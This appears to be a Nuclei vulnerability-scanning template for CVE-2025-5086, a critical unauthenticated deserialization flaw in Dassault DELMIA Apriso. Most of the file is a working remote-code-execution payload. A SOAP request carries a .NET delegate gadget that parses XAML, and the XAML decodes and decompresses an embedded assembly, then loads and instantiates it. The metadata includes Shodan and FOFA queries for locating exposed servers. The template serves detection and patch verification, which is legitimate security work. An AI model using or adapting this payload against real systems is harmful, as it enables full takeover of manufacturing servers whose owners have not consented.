id: CVE-2025-5086

info:
  name: Dassault Systèmes DELMIA Apriso (up to 2025) - Insecure Deserialization
  author: hacktronai,iamnoooob,pdresearch
  severity: critical
  description: |
    A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to execute arbitrary code on DELMIA Apriso servers, achieving complete system compromise.
  remediation: |
    Upgrade DELMIA Apriso to a version later than Release 2025 that properly validates deserialized data.
  reference:
    - https://www.hacktron.ai/blog/posts/dassault-delmia-apriso-rce/
    - https://www.3ds.com/vulnerability/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2025-5086
    cwe-id: CWE-502
    epss-score: 0.41392
    epss-percentile: 0.97475
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"apriso"
    fofa-query: body="/Apriso/Portal"
  tags: cve,cve2025,delmia,apriso,serialization,rce,kev,vkev,vuln

http:
  - raw:
      - |-
        POST /apriso/WebServices/FlexNetOperationsService.svc/Invoke HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Soapaction: "http://tempuri.org/IFlexNetOperationsService/Invoke"

        2<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089CompareSystem.StringSystem.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]ParsePresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35System.Windows.Markup.XamlReaderSystem.Func`2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.Object Parse(System.String)System.Object Parse(System.String)8Int32 Compare(System.String, System.String)System.Int32 Compare(System.String, System.String)82
        <ResourceDictionary
          xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
          xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
          xmlns:s="clr-namespace:System;assembly=mscorlib"
          xmlns:r="clr-namespace:System.Reflection;assembly=mscorlib"
          xmlns:i="clr-namespace:System.IO;assembly=mscorlib"
          xmlns:c="clr-namespace:System.IO.Compression;assembly=System"
        >
          <s:Array x:Key="data" x:FactoryMethod="s:Convert.FromBase64String">
            <x:Arguments>
              <s:String>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</s:String>
            </x:Arguments>
          </s:Array>
          <i:MemoryStream x:Key="inputStream">
            <x:Arguments>
              <StaticResource ResourceKey="data"></StaticResource>
            </x:Arguments>
          </i:MemoryStream>
          <c:GZipStream x:Key="gzipStream">
            <x:Arguments>
              <StaticResource ResourceKey="inputStream"></StaticResource>
              <c:CompressionMode>0</c:CompressionMode>
            </x:Arguments>
          </c:GZipStream>
          <s:Array x:Key="buf" x:FactoryMethod="s:Array.CreateInstance">
            <x:Arguments>
              <x:Type TypeName="s:Byte"/>
              <x:Int32>3584</x:Int32>
            </x:Arguments>
          </s:Array>
          <ObjectDataProvider x:Key="tmp" ObjectInstance="{StaticResource gzipStream}" MethodName="Read">
            <ObjectDataProvider.MethodParameters>
              <StaticResource ResourceKey="buf"></StaticResource>
              <x:Int32>0</x:Int32>
              <x:Int32>3584</x:Int32>
            </ObjectDataProvider.MethodParameters>
          </ObjectDataProvider>
          <ObjectDataProvider x:Key="asmLoad" ObjectType="{x:Type r:Assembly}" MethodName="Load">
            <ObjectDataProvider.MethodParameters>
              <StaticResource ResourceKey="buf"></StaticResource>
            </ObjectDataProvider.MethodParameters>
          </ObjectDataProvider>
          <ObjectDataProvider x:Key="types" ObjectInstance="{StaticResource asmLoad}" MethodName="GetTypes">
            <ObjectDataProvider.MethodParameters/>
          </ObjectDataProvider>
          <ObjectDataProvider x:Key="firstType" ObjectInstance="{StaticResource types}" MethodName="GetValue">
            <ObjectDataProvider.MethodParameters>
              <s:Int32>0</s:Int32>
            </ObjectDataProvider.MethodParameters>
          </ObjectDataProvider>
          <ObjectDataProvider x:Key="createInstance" ObjectInstance="{StaticResource firstType}" MethodName="InvokeMember">
            <ObjectDataProvider.MethodParameters>
              <x:Null/>
              <r:BindingFlags>512</r:BindingFlags>
              <x:Null/>
              <x:Null/>
              <x:Null/>
              <x:Null/>
              <x:Null/>
              <x:Null/>
            </ObjectDataProvider.MethodParameters>
          </ObjectDataProvider>
        </ResourceDictionary>

    matchers:
      - type: dsl
        dsl:
          - 'contains(projectdiscovery, "cve-2025-5086")'
          - 'contains(content_type, "text/xml")'
          - 'status_code == 500'
        condition: and
# digest: 4b0a00483046022100c2e09f0f9909d8556940dd14997ad3c371af9be7e2502afcc11c45c84d05a48d022100d8b2079881860925e4aa845711eb8c650af64df49f8c61148720082fb3a36db8:922c64590222798bb761d5b6d8e72950